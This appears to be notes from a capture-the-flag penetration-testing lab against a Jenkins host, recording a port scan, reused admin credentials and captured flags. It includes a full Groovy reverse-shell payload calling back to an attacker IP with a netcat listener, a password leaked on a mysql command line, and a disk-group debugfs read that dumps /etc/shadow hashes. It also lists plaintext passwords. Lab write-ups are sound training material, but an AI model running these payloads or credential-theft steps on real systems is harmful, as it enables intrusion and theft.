Rustscan
Open 172.16.1.19:80
Open 172.16.1.19:8080
Open 172.16.1.19:33060
Login to Jenkins with the password from DC02
Admin_129834765 SamsungOctober102030
getting the flag
http://172.16.1.19:8080/job/FLAG_HERE/
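DANTE{to_g0_4ward_y0u_mus7_g0_back}
Way to get a reverse shell: the Jenkins Script Console runs arbitrary Groovy as the Jenkins service account, so an administrator login there amounts to command execution on the host.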
https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6
String host=”10.10.14.3";int port=4444;String cmd=”bash”;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
nc -lvnp 4444
Making the shell interactive
python3 -c 'import pty; pty.spawn("/bin/bash")'
PSPy64
/bin/bash mysql -u ian -p VPN123ZXC
Login as ian (presumably with the password exposed in the mysql command line above)
su ian
Linpeas
====================================( Users Information )=====================================
[+] My user
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#groups
uid=1001(ian) gid=1001(ian) groups=1001(ian),6(disk)
uid=1000(lou) gid=1000(lou) groups=1000(lou),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare)
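mysql is there
Group disk
ian is a member of the disk group (gid 6), which grants raw access to block devices; that is why debugfs can open /dev/sda5 and read /etc/shadow without root. Membership of disk is effectively root-equivalent and should be audited as such.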
df -h
debugfs /dev/sda5
cat /etc/shadow
root:$6$J/xusJ2LSZlQSboS$kijhmbrRC7q9Hy9CZQCzXDgkMTlARqKxLuM/VflUxXIddE86.FNogbLrlkVPuaK5UtBE1dSKLMtNYPlJXDITW.:18480:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
avahi-autoipd:*:18375:0:99999:7:::
usbmux:*:18375:0:99999:7:::
rtkit:*:18375:0:99999:7:::
dnsmasq:*:18375:0:99999:7:::
cups-pk-helper:*:18375:0:99999:7:::
speech-dispatcher:!:18375:0:99999:7:::
avahi:*:18375:0:99999:7:::
kernoops:*:18375:0:99999:7:::
saned:*:18375:0:99999:7:::
nm-openvpn:*:18375:0:99999:7:::
hplip:*:18375:0:99999:7:::
whoopsie:*:18375:0:99999:7:::
colord:*:18375:0:99999:7:::
geoclue:*:18375:0:99999:7:::
pulse:*:18375:0:99999:7:::
gnome-initial-setup:*:18375:0:99999:7:::
gdm:*:18375:0:99999:7:::
lou:$6$WJTcuSqcV4rxO/oL$5Pq/jCOlGvMVTAMSdANO6ku9bWWHae.QDi0ksSEK/MnueAUs.CxLXk0GaF1BWs9w3jUXlgTnLcGRT7x1byyRc1:18480:0:99999:7:::
systemd-coredump:!!:18423::::::
jenkins:*:18423:0:99999:7:::
mysql:!:18423:0:99999:7:::
ian:$6$CVnBOwSsKhD3PDAX$QQRNv.7Q2Xieybazy7pD8lfqGEzPN16BzDGwQ9DBkypBvcITbkwE3OTCdGV0d3ZUjgx9yjtU7rIuRIKy5UmNH0:18480:0:99999:7:::
DANTE{g0tta_<3_ins3cur3_GROupz!}